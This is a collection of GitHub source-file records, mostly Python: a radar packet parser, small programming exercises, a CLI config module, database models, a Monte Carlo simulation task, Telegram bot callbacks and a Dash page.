data_port):\n \"\"\"\n @brief Safely close COM Ports, deinits GPIO pins and terminates sensor \n operation.\n @param error_msg is the message printed to terminal.\n @param cli_port is the CLI port reference.\n @param data_port is the data port reference.\n @return None\n \"\"\"\n if cli_port:\n cli_port.write(('sensorStop\\n').encode())\n cli_port.close()\n if data_port:\n data_port.close()\n deinit_gpio()\n sys.exit(error_msg)\n\ndef restart(cli_port, data_port):\n \"\"\"\n @brief Restarts and re-initialises the AWR1843 device.\n @param cli_port is the CLI port reference.\n @param data_port is the data port reference.\n @return The port references.\n \"\"\"\n # Close connections\n if cli_port:\n cli_port.close()\n if data_port:\n data_port.close()\n \n # Restart AWR1843\n toggle_gpio()\n\n # Re-initialise the device\n cli_port, data_port = init_ports()\n if not cli_port or not data_port:\n terminate(\"[AWR1843] COM Ports are Unavailable.\", cli_port, data_port)\n init_config(CHIRP_CONF, cli_port)\n return cli_port, data_port\n\ndef data_request(cli_port, data_port):\n \"\"\"\n @brief Requests and receives a new data packet from the AWR1843.\n @param cli_port is the CLI port reference.\n @param data_port is the data port reference.\n @return The data buffer.\n \"\"\"\n # Request new data packet\n cli_port.write(('dataRequest\\n').encode())\n time.sleep(0.25)\n # Read response\n data_buf = data_port.read(data_port.in_waiting)\n return data_buf\n\ndef parse_header(data_arr, pos):\n \"\"\"\n @brief Parses the packet header.\n @param data_arr contains the data from the AWR1843.\n @param pos is the position in the current parsing position in data_arr.\n @return The formatted packet header and a new buffer pointer position.\n \"\"\"\n # Parse through the header info\n magic_num = ''\n for i in range(4):\n magic_num += format(np.matmul(data_arr[pos:pos+2], WORD_16), \\\n '04X'); pos+=2\n version = format(np.matmul(data_arr[pos:pos+4], WORD_32), \\\n '08X'); pos+=4\n platform = format(np.matmul(data_arr[pos:pos+4], WORD_32), \\\n '08X'); pos+=4\n time_stamp = np.matmul(data_arr[pos:pos+4], WORD_32); pos+=4\n total_pkt_len = np.matmul(data_arr[pos:pos+4], WORD_32); pos+=4\n frame_num = np.matmul(data_arr[pos:pos+4], WORD_32); pos+=4\n subframe_num = np.matmul(data_arr[pos:pos+4], WORD_32); pos+=4\n chirp_proc_margin = 
np.matmul(data_arr[pos:pos+4], WORD_32); pos+=4\n frame_proc_margin = np.matmul(data_arr[pos:pos+4], WORD_32); pos+=4\n track_proc_time = np.matmul(data_arr[pos:pos+4], WORD_32); pos+=4\n uart_send_time = np.matmul(data_arr[pos:pos+4], WORD_32); pos+=4\n num_tlv = np.matmul(data_arr[pos:pos+2], WORD_16); pos+=2\n checksum = np.matmul(data_arr[pos:pos+2], WORD_16); pos+=2\n\n # Store the data in a dictionary\n header = {'magic_num': magic_num,\n 'version': version, \n 'platform': platform, \n 'time_stamp': time_stamp, \n 'total_pkt_len': total_pkt_len, \n 'frame_num': frame_num, \n 'subframe_num': subframe_num, \n 'chirp_proc_margin': chirp_proc_margin, \n 'frame_proc_margin': frame_proc_margin, \n 'track_proc_time': track_proc_time, \n 'uart_send_time': uart_send_time, \n 'num_tlv': num_tlv,\n 'checksum': checksum\n }\n\n return header, pos\n\ndef check_header(header, data_buf):\n \"\"\"\n @brief Verifies the device specific variables and checksum.\n @param header is the parsed packet header data.\n @param data_buf is the original data buffer from the AWR1843.\n @return True if valid, false otherwise.\n \"\"\"\n # Calculate Header Checksum\n cs_arr = np.frombuffer(data_buf, dtype='uint16')[:(SIZE_PKT_HEADER//2)]\n cs_sum = np.uint32(0)\n for val in cs_arr:\n cs_sum += val\n cs_sum = (cs_sum >> 16) + (cs_sum & 0xFFFF)\n cs_sum += (cs_sum >> 16)\n calc_cs = np.uint16(~cs_sum)\n\n # Determine Validity\n if header['magic_num'] != MAGIC_WORD or \\\n header['version'] != SDK_VERSION or \\\n header['platform'] != DEV_PLATFORM or \\\n header['total_pkt_len'] != len(data_buf) or \\\n calc_cs != 0:\n return False\n else:\n return True\n\ndef parse_pc_sph_data(data_arr, tlv_len, pos):\n \"\"\"\n @brief Parses the Point Cloud Sphereical data and formats the info.\n @param data_arr contains the data from the AWR1843.\n @param tlv_len is the length specified in the TLV header.\n @param pos is the position in the current parsing position in data_arr.\n @return The formatted data and a new buffer pointer position.\n \"\"\"\n num_objs = tlv_len // SIZE_PC_SPHERICAL\n # Initialise arrays for data\n ranges = np.zeros(num_objs, dtype=np.float32)\n azimuth = np.zeros(num_objs, dtype=np.float32)\n elevation = np.zeros(num_objs, dtype=np.float32)\n doppler = np.zeros(num_objs, dtype=np.float32)\n # Parse and store data\n for obj in range(num_objs):\n ranges[obj] = data_arr[pos:pos+4].view(dtype=np.float32); pos+=4\n azimuth[obj] = data_arr[pos:pos+4].view(dtype=np.float32); pos+=4\n elevation[obj] = data_arr[pos:pos+4].view(dtype=np.float32); pos+=4\n doppler[obj] = data_arr[pos:pos+4].view(dtype=np.float32); pos+=4\n\n # Store the data in a dictionary\n pc_sph_data = {'num_objs': num_objs, \n 'ranges': ranges, \n 'azimuth': azimuth, \n 'elevation': elevation, \n 'doppler': doppler\n }\n\n return pc_sph_data, pos\n\ndef parse_target_data(data_arr, tlv_len, pos):\n \"\"\"\n @brief Parses the Target data and formats the info.\n @param data_arr contains the data from the AWR1843.\n @param tlv_len is the length specified in the TLV header.\n @param pos is the position in the current parsing position in data_arr.\n @return The formatted data and a new buffer pointer position.\n \"\"\"\n num_objs = tlv_len // SIZE_TARGET_LIST\n # Initialise arrays for data\n tid = np.zeros(num_objs, dtype=np.uint32)\n posX = np.zeros(num_objs, dtype=np.float32)\n posY = np.zeros(num_objs, dtype=np.float32)\n posZ = np.zeros(num_objs, dtype=np.float32)\n velX = np.zeros(num_objs, dtype=np.float32)\n velY = np.zeros(num_objs, 
dtype=np.float32)\n velZ = np.zeros(num_objs, dtype=np.float32)\n accX = np.zeros(num_objs, dtype=np.float32)\n accY = np.zeros(num_objs, dtype=np.float32)\n accZ = np.zeros(num_objs, dtype=np.float32)\n ec = np.zeros((num_objs, 16), dtype=np.float32)\n g = np.zeros(num_objs, dtype=np.float32)\n conf_lvl = np.zeros(num_objs, dtype=np.float32)\n # Parse and store data\n for obj in range(num_objs):\n tid[obj] = data_arr[pos:pos+4].view(dtype=np.uint32); pos+=4\n posX[obj] = data_arr[pos:pos+4].view(dtype=np.float32); pos+=4\n posY[obj] = data_arr[pos:pos+4].view(dtype=np.float32); pos+=4\n posZ[obj] = data_arr[pos:pos+4].view(dtype=np.float32); pos+=4\n velX[obj] = data_arr[pos:pos+4].view(dtype=np.float32); pos+=4\n velY[obj] = data_arr[pos:pos+4].view(dtype=np.float32); pos+=4\n velZ[obj] = data_arr[pos:pos+4].view(dtype=np.float32); pos+=4\n accX[obj] = data_arr[pos:pos+4].view(dtype=np.float32); pos+=4\n accY[obj] = data_arr[pos:pos+4].view(dtype=np.float32); pos+=4\n accZ[obj] = data_arr[pos:pos+4].view(dtype=np.float32); pos+=4\n for i in range(len(ec[0])):\n ec[obj][i] = data_arr[pos:pos+4].view(dtype=np.float32); pos+=4\n g[obj] = data_arr[pos:pos+4].view(dtype=np.float32); pos+=4\n conf_lvl[obj] = data_arr[pos:pos+4].view(dtype=np.float32); pos+=4\n\n # Store the data in a dictionary\n target_data = {'num_objs': num_objs, \n 'tid': tid, \n 'posX': posX, \n 'posY': posY, \n 'posZ': posZ,\n 'velX': velX, \n 'velY': velY, \n 'velZ': velZ, \n 'accX': accX, \n 'accY': accY, \n 'accZ': accZ,\n 'ec': ec, \n 'g': g, \n 'conf_lvl': conf_lvl\n }\n\n return target_data, pos\n\ndef parse_tgt_id_data(data_arr, tlv_len, pos):\n \"\"\"\n @brief Parses the Target Index data and formats the info.\n @param data_arr contains the data from the AWR1843.\n @param tlv_len is the length specified in the TLV header.\n @param pos is the position in the current parsing position in data_arr.\n @return The formatted data and a new buffer pointer position.\n \"\"\"\n num_objs = tlv_len // SIZE_TARGET_INDEX\n # Initialise arrays for data\n target_id = np.zeros(num_objs, dtype=np.uint8)\n # Parse and store data\n for obj in range(num_objs):\n target_id[obj] = data_arr[pos:pos+1].view(dtype=np.uint8); pos+=1\n\n # Store the data in a dictionary\n tgt_id_data = {'num_objs': num_objs, \n 'target_id': target_id\n }\n\n return tgt_id_data, pos\n\ndef parse_pc_sid_data(data_arr, tlv_len, pos):\n \"\"\"\n @brief Parses the Point Cloud Side Info data and formats the info.\n @param data_arr contains the data from the AWR1843.\n @param tlv_len is the length specified in the TLV header.\n @param pos is the position in the current parsing position in data_arr.\n @return The formatted data and a new buffer pointer position.\n \"\"\"\n num_objs = tlv_len // SIZE_PC_SIDE_INFO\n # Initialise arrays for data\n snr = np.zeros(num_objs, dtype=np.int16)\n noise = np.zeros(num_objs, dtype=np.int16)\n # Parse and store data\n for obj in range(num_objs):\n snr[obj] = data_arr[pos:pos+2].view(dtype=np.int16); pos+=2\n noise[obj] = data_arr[pos:pos+2].view(dtype=np.int16); pos+=2\n\n # Store the data in a dictionary\n pc_sid_data = {'num_objs': num_objs, \n 'snr': snr, \n 'noise': noise\n }\n\n return pc_sid_data, pos\n\ndef parse_pkt(data_buf):\n \"\"\"\n @brief Parse data packet into a formatted dictionary.\n @param data_buf is the original data buffer from the AWR1843.\n @return The parsed data.\n \"\"\"\n # Initialise Variables\n pos = 0\n pc_sph_data = {}\n target_data = {}\n tgt_id_data = {}\n pc_sid_data = {}\n data_arr = 
np.frombuffer(data_buf, dtype='uint8')\n\n # Parse Header Information\n header, pos = parse_header(data_arr, pos)\n valid_header = check_header(header, data_buf)\n if not valid_header:\n return {}\n\n # Parse Packet Contents\n for tlv_id in range(header['num_tlv']):\n tlv_type = np.matmul(data_arr[pos:pos+4], WORD_32); pos+=4\n tlv_len = np.matmul(data_arr[pos:pos+4], WORD_32); pos+=4\n\n if tlv_type == DPIF_POINT_CLOUD_SPHERICAL:\n pc_sph_data, pos = parse_pc_sph_data(data_arr, tlv_len, pos)\n elif tlv_type == TARGET_LIST_3D:\n target_data, pos = parse_target_data(data_arr, tlv_len, pos)\n elif tlv_type == TARGET_INDEX:\n tgt_id_data, pos = parse_tgt_id_data(data_arr, tlv_len, pos)\n elif tlv_type == DPIF_POINT_CLOUD_SIDE_INFO:\n pc_sid_data, pos = parse_pc_sid_data(data_arr, tlv_len, pos)\n else:\n break\n\n # Verify all data was parsed - consider padding bytes (no-op when already aligned)\n pos += (OUTPUT_MSG_SEGMENT_LEN - (pos & (OUTPUT_MSG_SEGMENT_LEN-1))) & (OUTPUT_MSG_SEGMENT_LEN-1)\n if (pos != header['total_pkt_len']):\n return {}\n\n # Time stamp data and finalise packet format\n current_time = datetime.now()\n data_pkt = {'time': current_time, \n 'header': header, \n 'pc_sph_data': pc_sph_data, \n 'target_data': target_data, \n 'tgt_id_data': tgt_id_data, \n 'pc_sid_data': pc_sid_data\n }\n\n return data_pkt\n\n\nif __name__ == '__main__':\n # Initialise the Jetson GPIO pins and restart the AWR1843\n init_gpio()\n toggle_gpio()\n\n # Initialise the CLI and Data ports with the AWR1843\n cli_port, data_port = init_ports()\n if not cli_port or not data_port:\n terminate(\"[AWR1843] COM Ports are Unavailable.\", cli_port, data_port)\n\n # Transmit the chirp configuration file\n init_config(CHIRP_CONF, cli_port)\n\n try:\n # Main Program Loop\n while True:\n # Request new data packet\n data_buf = data_request(cli_port, data_port)\n if len(data_buf) == 0:\n cli_port, data_port = restart(cli_port, data_port)\n continue\n \n # Parse data packet\n data_pkt = parse_pkt(data_buf)\n if not data_pkt:\n continue\n\n except KeyboardInterrupt:\n terminate('[AWR1843] Terminate Program.', cli_port, data_port)","repo_name":"mitchmanning/ENGG4811","sub_path":"03_dev/01_sensor_system/awr1843.py","file_name":"awr1843.py","file_ext":"py","file_size_in_byte":16006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20492688122","text":"file = open('data.txt','a')\r\n\r\n# data = \"This file is written using python script\"\r\n\r\ndata = [\r\n {'name' : 'Ram', 'age' : 16},\r\n {'name' : 'Ramesh', 'age' : 17},\r\n {'name' : 'Raman', 'age' : 15}\r\n]\r\n\r\n# file.write(str(data))\r\n\r\nfor d in data:\r\n file.write(str(d).strip('{}') + '\\n')\r\n\r\nfile.close()","repo_name":"ravi4all/PythonFeb_9-30","sub_path":"10-FileHandling/03-Append.py","file_name":"03-Append.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25648334060","text":"import sys\n\nfrom typing import List\n\nfrom clipped.formatting import Printer\n\nfrom haupt.managers.sandbox import SandboxConfigManager\nfrom haupt.settings import set_sandbox_config\nfrom polyaxon._cli.config import set_home_path\nfrom polyaxon._cli.errors import handle_cli_error\nfrom polyaxon._managers.home import HomeConfigManager\n\n\ndef show():\n \"\"\"Show the current sandbox config.\"\"\"\n _config = HomeConfigManager.get_config_or_default()\n Printer.heading(\n \"In addition to environment variables, global configs will be loaded from:\"\n )\n 
Printer.dict_tabulate(_config.to_dict())\n _config = SandboxConfigManager.get_config_or_default()\n Printer.heading(\"Sandbox config:\")\n Printer.dict_tabulate(_config.to_dict())\n\n\ndef get(keys: List[str]):\n \"\"\"Get the specific keys from the sandbox configuration.\"\"\"\n _config = SandboxConfigManager.get_config_or_default()\n\n if not keys:\n return\n\n print_values = {}\n for key in keys:\n key = key.replace(\"-\", \"_\")\n if hasattr(_config, key):\n print_values[key] = getattr(_config, key)\n else:\n Printer.print(\"Key `{}` is not recognised.\".format(key))\n\n Printer.dict_tabulate(print_values)\n\n\ndef set(**kwargs): # pylint:disable=redefined-builtin\n \"\"\"Set the sandbox config values.\"\"\"\n try:\n _config = SandboxConfigManager.get_config_or_default()\n except Exception as e:\n handle_cli_error(e, message=\"Load configuration.\")\n Printer.heading(\"You can reset your config by running: `sandbox config-purge`\")\n sys.exit(1)\n\n for key, value in kwargs.items():\n if value is not None:\n if key == \"path\":\n set_home_path(home_path=value)\n else:\n setattr(_config, key, value)\n\n set_sandbox_config(_config, persist=True)\n Printer.success(\"Config was updated.\")\n\n\ndef purge():\n \"\"\"Purge the sandbox config values.\"\"\"\n SandboxConfigManager.purge()\n Printer.success(\"Sandbox config was removed.\")\n","repo_name":"polyaxon/haupt","sub_path":"haupt/haupt/cli/runners/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","stars":452,"dataset":"github-code","pt":"72"} +{"seq_id":"41841588164","text":"import json\nimport uuid\nfrom datetime import datetime\n\nimport pytz\nfrom sqlalchemy.dialects.postgresql import UUID\n\nfrom src.db.db import db\n\n\nclass User(db.Model):\n id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4,\n unique=True, nullable=False)\n login = db.Column(db.VARCHAR(50), unique=True, nullable=False)\n\n password = db.Column(db.String(256), nullable=False)\n active = db.Column(db.BOOLEAN, default=True)\n\n created = db.Column(db.DateTime)\n modified = db.Column(db.DateTime, default=datetime.utcnow)\n\n is_authenticated = db.Column(db.BOOLEAN, default=False)\n is_active = db.Column(db.BOOLEAN, default=False)\n is_anonymous = db.Column(db.BOOLEAN, default=True)\n\n # relationships\n\n auth_history = db.relationship('UserAuth')\n roles = db.relationship('Role', secondary='role_user',\n back_populates='users')\n\n def __repr__(self):\n return f'User: {self.id}: {self.login}'\n\n def to_json(self) -> dict:\n # note: no 'email' column exists on this model, so it is not serialised\n return {\n 'id': self.id,\n 'login': self.login,\n 'roles': [role.to_json() for role in self.roles]\n if self.roles else [],\n 'auth_history': [auth.to_json() for auth in self.auth_history]\n if self.auth_history else [],\n 'created': json.dumps(self.created.astimezone(pytz.UTC),\n default=str) if self.created else None,\n 'modified': json.dumps(self.modified.astimezone(pytz.UTC),\n default=str) if self.modified else None,\n }\n\n\nclass UserAuth(db.Model):\n id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4,\n unique=True, nullable=False)\n user_id = db.Column(UUID(as_uuid=True), db.ForeignKey('user.id'),\n nullable=False)\n ip_address = db.Column(db.String(15))\n user_agent = db.Column(db.String(256))\n platform = db.Column(db.String(256), nullable=True)\n browser = db.Column(db.String(256), nullable=True)\n date = db.Column(db.DateTime, default=datetime.utcnow)\n\n def to_json(self) -> dict:\n 
return {\n 'id': self.id,\n 'user_id': self.user_id,\n 'ip_address': self.ip_address,\n 'user_agent': self.user_agent,\n 'platform': self.platform,\n 'browser': self.browser,\n 'date': self.date,\n }\n","repo_name":"BLARRCHER/Auth-Service","sub_path":"auth_service/src/models/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74013562474","text":"#!/usr/bin/env python\n\nfrom abc import ABC, abstractmethod\n\n\n# Component interface\nclass Component(ABC):\n @abstractmethod\n def calculate_price(self):\n pass\n\n\n# Leaf class representing a Product\nclass Product(Component):\n def __init__(self, name, price):\n self.name = name\n self.price = price\n\n def calculate_price(self):\n return self.price\n\n\n# Composite class representing a Box\nclass Box(Component):\n def __init__(self, name, price):\n self.name = name\n self.items = []\n self.price = price\n\n def add(self, item):\n self.items.append(item)\n\n def calculate_price(self):\n total_price = 0\n for item in self.items:\n total_price += item.calculate_price()\n return total_price + self.price\n\n\ndef composite():\n apple = Product(\"Apple\", 1)\n banana = Product(\"Banana\", 2)\n orange = Product(\"Orange\", 3)\n\n fruit_box = Box(\"Fruit Box\", 2)\n fruit_box.add(apple)\n fruit_box.add(banana)\n fruit_box.add(orange)\n\n small_box = Box(\"Small Box\", 2)\n small_box.add(fruit_box)\n\n print(apple.calculate_price()) # Output: 1\n print(fruit_box.calculate_price()) # Output: 8 (1 + 2 + 3 + 2)\n print(small_box.calculate_price()) # Output: 10 (8 + 2)\n\n\ncomposite()\n","repo_name":"Talandar99/design_patterns","sub_path":"python/composite.py","file_name":"composite.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17865806378","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 24 12:57:52 2021\r\n\r\n@author: ahato\r\n\"\"\"\r\n\r\nimport sys\r\n\r\ndef move(symbol):\r\n x = int(reader.readline())\r\n y = int(reader.readline())\r\n if board[x][y] == \" \":\r\n board[x][y]=symbol\r\n if rowwin(symbol, x) == True or colwin(symbol, y) == True:\r\n print(\"Winning move at {} {}\".format(x,y))\r\n if m == n and diag(symbol) == True:\r\n print(\"Winning move at {} {}\".format(x,y))\r\n \r\n else:\r\n print(\"Invalid move at {} {}\".format(x,y))\r\n\r\ndef rowwin(a,row):\r\n winrow = True\r\n for j in range(0,n):\r\n if board[row][j] != a:\r\n winrow = False\r\n return(winrow)\r\n\r\ndef colwin(b,col):\r\n wincol = True\r\n for k in range(0,m):\r\n if board[k][col] != b:\r\n wincol = False\r\n return(wincol)\r\n \r\ndef diag(symb):\r\n windiag = True\r\n for i in range(m):\r\n if board[i][i] != symb:\r\n windiag = False\r\n return(windiag)\r\n\r\n\r\nif len(sys.argv) > 1:\r\n reader = open(sys.argv[1])\r\nelse:\r\n reader = sys.stdin\r\n\r\nm = int(reader.readline())\r\nn = int(reader.readline())\r\n\r\nif m > 0 and n > 0 and m <= 256 and n <= 256:\r\n board = []\r\n for i in range(m):\r\n board.append([])\r\n for j in range(n):\r\n board[i].append(\" \")\r\n\r\nfor i in range(0,m):\r\n move(\"X\")\r\n move(\"O\")\r\n \r\n\r\n \r\n","repo_name":"Ahat0z/Ahat0z","sub_path":"TicTacToe.py","file_name":"TicTacToe.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18425772827","text":"# Weekly Task 
2 (Programming & Scripting) Jack Caffrey\n# Code allows the user to input their weight (KG) & height (CM) and outputs their BMI\n\nweight = float(input(\"Please enter your Weight in Kilograms (KG): \"))\nheight = float(input(\"Please enter your Height in centimetres (CM): \"))\n\n# print (\"The weight entered is weight\" , weight , \"and height entered is\" , height,) code line used to verify inputs working correctly\n\nMeters_Squared = ((height / 100) ** 2) # converts height in CM to metres, then squares it\n\nBMI = (weight / Meters_Squared) # Calculates BMI (kg/m^2)\n\nnew_BMI = round(BMI, 2) # Rounds BMI to 2 decimal places\nprint (\"Your BMI is\" , new_BMI) # displays the user's BMI","repo_name":"JackCaff/problem_solving2020","sub_path":"WT02/WT02.py","file_name":"WT02.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27808597739","text":"'''\nCreated on Sep 9, 2015\n\n@author: wirkert\n'''\n\n\nimport logging\nimport datetime\nimport os\nimport time\n\nimport numpy as np\nimport luigi\n\nimport commons\nimport mc.factories as mcfac\nfrom mc.sim import SimWrapper\nfrom mc.create_spectrum import create_spectrum\n\n# parameter setting\nNR_BATCHES = 100\nNR_ELEMENTS_IN_BATCH = 1000\n# the wavelengths to be simulated\nWAVELENGTHS = np.arange(450, 720, 2) * 10 ** -9\nNR_PHOTONS = 10 ** 6\n\n# experiment configuration\nMCI_FILENAME = \"./temp.mci\"\nMCO_FILENAME = \"temp.mco\"\n# this path definitely needs to be adapted by you\nPATH_TO_MCML = \"/home/wirkert/workspace/monteCarlo/gpumcml/fast-gpumcml/\"\nEXEC_MCML = \"gpumcml.sm_20\"\n\n\nsc = commons.ScriptCommons()\n\n\nclass CreateSpectraTask(luigi.Task):\n df_prefix = luigi.Parameter()\n batch_nr = luigi.IntParameter()\n nr_samples = luigi.IntParameter()\n factory = luigi.Parameter()\n\n def output(self):\n return luigi.LocalTarget(os.path.join(sc.get_full_dir(\"MC_DATA_FOLDER\"),\n self.df_prefix + \"_\" +\n str(self.batch_nr) + \".txt\"))\n\n def run(self):\n start = time.time()\n # setup simulation wrapper\n sim_wrapper = SimWrapper()\n sim_wrapper.set_mci_filename(MCI_FILENAME)\n sim_wrapper.set_mcml_executable(os.path.join(PATH_TO_MCML, EXEC_MCML))\n # setup model\n tissue_model = self.factory.create_tissue_model()\n tissue_model.set_mci_filename(sim_wrapper.mci_filename)\n tissue_model.set_mco_filename(MCO_FILENAME)\n tissue_model.set_nr_photons(NR_PHOTONS)\n # setup array in which data shall be stored\n batch = self.factory.create_batch_to_simulate()\n batch.create_parameters(self.nr_samples)\n # dataframe created by batch:\n df = batch.df\n # add reflectance column to dataframe\n for w in WAVELENGTHS:\n df[\"reflectances\", w] = np.NAN\n\n # for each instance of our tissue model\n for i in range(df.shape[0]):\n # set the desired element in the dataframe to be simulated\n tissue_model.set_dataframe_row(df.loc[i, :])\n logging.info(\"running simulation \" + str(i) + \" for\\n\" +\n str(tissue_model))\n reflectances = create_spectrum(tissue_model, sim_wrapper,\n WAVELENGTHS)\n # store in dataframe\n for r, w in zip(reflectances, WAVELENGTHS):\n df[\"reflectances\", w][i] = r\n\n # clean up temporarily created files\n os.remove(MCI_FILENAME)\n created_mco_file = os.path.join(PATH_TO_MCML, MCO_FILENAME)\n if os.path.isfile(created_mco_file):\n os.remove(created_mco_file)\n # save the created output\n f = open(self.output().path, 'w')\n df.to_csv(f)\n\n end = time.time()\n logging.info(\"time for creating batch of mc data: %.f s\" %\n (end - 
start))\n\n\nif __name__ == '__main__':\n\n # create a folder for the results if necessary\n sc.set_root(\"/media/wirkert/data/Data/2016_02_02_IPCAI/\")\n sc.create_folders()\n\n logging.basicConfig(filename=os.path.join(sc.get_full_dir(\"LOG_FOLDER\"),\n \"calculate_spectra\" +\n str(datetime.datetime.now()) +\n '.log'),\n level=logging.INFO)\n ch = logging.StreamHandler()\n ch.setLevel(logging.INFO)\n logger = logging.getLogger()\n logger.addHandler(ch)\n luigi.interface.setup_interface_logging()\n\n sch = luigi.scheduler.CentralPlannerScheduler()\n w = luigi.worker.Worker(scheduler=sch)\n BATCH_NUMBERS = np.arange(0, NR_BATCHES, 1)\n for i in BATCH_NUMBERS:\n colon_task = CreateSpectraTask(\"ipcai_revision_generic_mean_scattering\",\n i,\n NR_ELEMENTS_IN_BATCH,\n mcfac.GenericMeanScatteringFactory())\n w.add(colon_task)\n w.run()\n\n","repo_name":"RabadanLab/MITKats","sub_path":"Modules/Biophotonics/python/iMC/scripts/ipcai2016/script_calculate_spectra.py","file_name":"script_calculate_spectra.py","file_ext":"py","file_size_in_byte":4087,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14723004059","text":"# CCC 15 J5 - Pi Day\n# Tissan Kugathas\n# February 24 2020\n\nn = int(input())\nk = int(input())\n\n\ndef pie(pieces, people, minimum):\n total = 0\n if people/pieces == minimum:\n return 1\n elif people == 1:\n return 1\n else:\n times = (pieces//people)\n # the largest share for the first person is pieces//people, inclusive\n for i in range(minimum, times + 1):\n total += pie(pieces-i, people-1, i)\n return total\n\n\nif 1 <= n <= 250 and 1 <= k <= n:\n print(pie(n, k, 1))\n","repo_name":"ktissan13/Waterloo-CCC","sub_path":"2015/j5.py","file_name":"j5.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"70268165993","text":"from telegram import InlineKeyboardButton, InlineKeyboardMarkup, ParseMode, Update\nfrom telegram.ext import (\n CallbackContext,\n CallbackQueryHandler,\n CommandHandler,\n Filters,\n MessageHandler,\n)\nfrom telegram.ext.dispatcher import DispatcherHandlerStop, run_async\nfrom telegram.utils.helpers import escape_markdown\nfrom Yuriko.__main__ import *\n\n\n# Buttons Function for admin module\n\n \ndef null_game_callback(update, context):\n query = update.callback_query\n if query.data == \"gamexd_\":\n query.message.edit_text(\n text=\"\"\"Here is the help for the *Game* module:\n\nWe do not promise to update KIGO every day\n\n✗ /game - `to play a game in Chrome and elsewhere`\n\n**✗ Pᴏᴡᴇʀᴇᴅ 🔥 Bʏ: Kɪɢᴏ Dᴜɴɪʏᴀ!**\n \"\"\",\n parse_mode=ParseMode.MARKDOWN,\n disable_web_page_preview=True,\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(text=\"Back\", callback_data=\"help_back\")\n ]\n ]\n ),\n )\n\n \ndef kigo_game_memify_callback(update, context):\n query = update.callback_query\n if query.data == \"nullgame_\":\n query.message.edit_text(\n text=\"\"\" Here is the help for the *A-game* module:\n\n**✗ A-Game Module for playing animated games in a group**\n \n✗ /dice - `dice game`\n✗ /dart - `dart game`\n✗ /ball - `to play ball game`\n\n**✗ Pᴏᴡᴇʀᴇᴅ 🔥 Bʏ: Kɪɢᴏ Dᴜɴɪʏᴀ!**\"\"\",\n parse_mode=ParseMode.MARKDOWN,\n disable_web_page_preview=True,\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(text=\"Back\", callback_data=\"help_back\")\n ]\n ]\n ),\n )\n\n\n\n# Handlers start from here \n\ngame_callback_handler = CallbackQueryHandler(null_game_callback, pattern=r\"gamexd_\", run_async=True)\ngame_memify_callback_handler = 
CallbackQueryHandler(kigo_game_memify_callback, pattern=r\"nullgame_\", run_async=True)\n\n\n\n\n\n\n","repo_name":"AMANTYA1/Moon","sub_path":"Yuriko/button/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"40515283668","text":"import sys\r\n\r\nwysokosc = int(input(\"Enter the diamond height: \"))\r\n\r\nlitera = str(\"o\")\r\na = int(1)\r\n\r\nif 3 <= wysokosc <= 9:\r\n if wysokosc % 2 == 0:\r\n print(\"Cannot build the diamond! The number must be odd\")\r\n else:\r\n\r\n srodek = int((wysokosc+1)/2)\r\n sr = srodek\r\n while 1 < sr:\r\n sr = sr-1\r\n print(\" \" * sr, end = '')\r\n print(\"o\" * ((srodek-sr)+(srodek-sr)-1))\r\n print(\"o\" * ((srodek * 2)-1))\r\n\r\n while a < srodek:\r\n print(\" \" * a, end = '')\r\n print(\"o\" * ((srodek-a)+(srodek-a)-1))\r\n a = a+1\r\n\r\n\r\nelse:\r\n print(\"Cannot build the diamond! Invalid height entered\")","repo_name":"zeruken117/UWM-WD","sub_path":"WD/zadanie11.py","file_name":"zadanie11.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44612710405","text":"def sort_by_line(matrix: list[list], k: int) -> list[list]:\n i = 0\n while i != len(matrix[k]) - 1:\n j = 0\n while j < len(matrix[k]) - 1 - i:\n if matrix[k][j] > matrix[k][j + 1]:\n for z in range(len(matrix)):\n matrix[z][j], matrix[z][j + 1] = matrix[z][j + 1], matrix[z][j]\n j += 1\n i += 1\n return matrix\n\nD = []\nm = 3\nn = 3\nk = int(input('Choose the index of the k-th row '))\n\nfor i in range(m):\n B = []\n for j in range(n):\n B.append(int(input(f'Enter element [{i} , {j}] of the matrix ')))\n D.append(B)\n\nfor i in range(m):\n for j in range(n):\n print(D[i][j], end=' ')\n print()\n\nsort_by_line(D,k)\n\nfor i in range(m):\n for j in range(n):\n print(D[i][j], end=' ')\n print()","repo_name":"Rauntfett/Chekanov-AM","sub_path":"задание 9/9.2.py","file_name":"9.2.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8925984205","text":"import dash\nimport dash_daq as daq\nimport dash_html_components as html\n\nlayout = html.Div(\n [\n html.Div(\n [\n html.H1(\"Thank you for your participation!\"),\n html.P(\n \"You can take this questionnaire as often as you want!\",\n className=\"lead\",\n ),\n ],\n className=\"jumbotron\",\n 